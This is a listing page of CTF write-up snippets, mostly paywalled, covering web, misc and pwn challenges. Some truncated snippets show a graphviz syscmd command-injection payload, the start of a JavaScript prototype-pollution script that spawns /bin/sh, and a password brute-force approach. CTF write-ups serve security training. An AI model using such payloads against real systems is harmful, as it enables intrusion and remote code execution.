-
MofuMofu Diary
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 11月前
-
sekaiCTF2023 - evalme (这个题需要修一下环境)
题目分为两个部分,一个nc端口,一个流量包。流量包打开之后,可以看到有一些HTTP流量,是和`35.196.65.151`这个服务器通信,每次POST的都是一个JSON,`{"data":"xx"}`,其中xx是一个字节的hex,返回报文都是`{“ok”:true}`。POST出去的内容似乎不是任何一个已知的文件格式或加密方式。接下来看nc端口,看起来是一个简单的加减乘除速算,有时间限制,重复连几...
- MISC
- 11月前
-
n00bz Packets don't lie (traffic analysis, osint)
题目给了一个pcap流量包+https_keys.log密钥文件,首先在wireshark里导入密钥,编辑-首选项-Protocols-TLS(可能有些版本Wireshark是SSL),在(Pre)-Master-Secretlogfilenames那里导入log,之后就可以看到http2的包了。大致看一眼,会发现有几个流量是查询wikipedia的,包括`/wiki/Switzerland`和一...
- MISC
- 11月前
-
[NUAACTF-2017]hello_pwn
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 11月前
-
God_of_Aim
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 11月前
-
ezlogin解题
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 11月前
-
西湖论剑2023-Node Magical Login
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 11月前
-
HEADache WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 11月前
-
command-injection WriteUp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 11月前
-
Request Basics 3
请求头增加 FLAG:n0s即可获得flag
- WEB
- 11月前
-
graphviz++
观察界面,发现功能是聚合两个graphviz对象,diagraph可以在里面通过syscmd写入命令,比如digraph{a0[label="syscmd(`catflag_foxtrot.txt\')"]}脚本代码如下,自行更改HOST和PORTimportrequestsimportosimportreHOST=os.getenv('HOST','82.157.146.43')PORT=os....
- WEB
- 11月前
-
maze js原型链污染
importrequestsimportjsonimportosHOST=os.getenv("HOST","82.157.146.43")PORT=os.getenv("PORT","16154")js="""varp=process.binding('process_wrap').Process;varproc=newp();proc.spawn({file:'/bin/sh',args:['...
- WEB
- 11月前
-
Upload_it_1
点击下方链接进入phpinfo,之后搜索flag
- WEB
- 11月前
-
0xGame-2021-bug1 writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 11月前
-
不太普通的图片
下载附件,发现是png使用stegsolve找到password:0xGameyyds使用cloacked-pixel工具python2lsb.pyextractstego.png2.txt0xGameyyds 获取flag为0xGame{Hidd3n_1n_Pic}
- MISC
- 11月前
-
HEADache
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 11月前
-
2023第三届陕西省大学生网络安全技能 hack_dns writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 11月前
-
0xGame-search
fuff爆破爆出admin/index.php,访问后得知需要登录获取flag,猜测用户名为admin,密码是4位数字爆到flag:0xGame{y0u_brut3_f0rc3_successfully}
- WEB
- 12月前
-
签到题目
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 12月前
-
read flag
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 12月前